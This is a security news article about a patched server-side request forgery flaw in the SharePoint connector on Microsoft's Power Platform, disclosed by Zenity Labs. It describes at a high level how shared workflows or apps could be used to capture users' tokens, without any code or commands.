Cybersecurity experts have recently unveiled a previously identified vulnerability within the Microsoft SharePoint connector on the Power Platform. This flaw, now patched, presented a critical risk by potentially enabling malicious actors to exploit user credentials, paving the way for subsequent attacks aimed at sensitive data repositories.
The exploitation of this vulnerability could allow attackers to issue unauthorized requests to the SharePoint API impersonating legitimate users, thereby gaining access to confidential information. A report from Zenity Labs indicates that the repercussions of such an attack extend across various services offered by the Power Platform, including Power Automate and Power Apps, considerably amplifying the threat landscape.
Senior security researcher Dmitry Lozovoy noted that the reach of this vulnerability is substantial, allowing for attacks that could compromise multiple interconnected systems within the Power Platform ecosystem. The nature of this attack emphasizes the importance of vigilance among organizations that utilize these platforms.
Following a responsible disclosure to Microsoft in September 2024, the company responded promptly, categorizing the issue with an “Important” severity level. As of December 13, the vulnerability has been resolved, according to official statements from the tech giant.
Fundamentally, this vulnerability is classified as a server-side request forgery (SSRF) due to the exploit involving the “custom value” feature within the SharePoint connector. This functionality permits an attacker to manipulate URLs included in workflows, making sufficient gains contingent upon obtaining specific user roles within the Power Platform.
To successfully execute such an attack, a user must first occupy the Environment Maker and Basic User roles within Power Platform. Attaining these roles typically requires an initial breach into the target organization, emphasizing the layered nature of cybersecurity defenses needed today.
Zenity described a hypothetical exploitation scenario wherein an attacker creates a malicious SharePoint workflow and shares it with an unsuspecting low-privileged user. This could lead to the compromise of the user’s SharePoint JSON Web Token (JWT), providing further unauthorized access.
Once the attacker has captured the JWT, they can make requests on behalf of the victim, significantly expanding their operational capacity across the Power Platform. Furthermore, the ease of extending these tactics to other platforms such as Power Apps and Copilot Studio could amplify the attack’s impact, affecting a broader array of users.
Embedding the malicious Canvas app into a Teams channel further illustrates the interconnected vulnerabilities found within the Power Platform. Interaction with such an app could aid in token harvesting across organizational channels, thereby intensifying the attack’s amplitude.
The inherent connectivity of Power Platform services presents significant security challenges, particularly given the widespread use of the SharePoint connector, where sensitive corporate data resides. This situation necessitates rigorous attention to access controls and compliance across organizational layers.
This incident also follows a series of detailed reports of vulnerabilities exposed in Azure DevOps that could have similarly severe consequences, highlighting the critical ongoing need for cybersecurity vigilance in the tech industry.
(This article has been updated to incorporate a statement from Microsoft.)
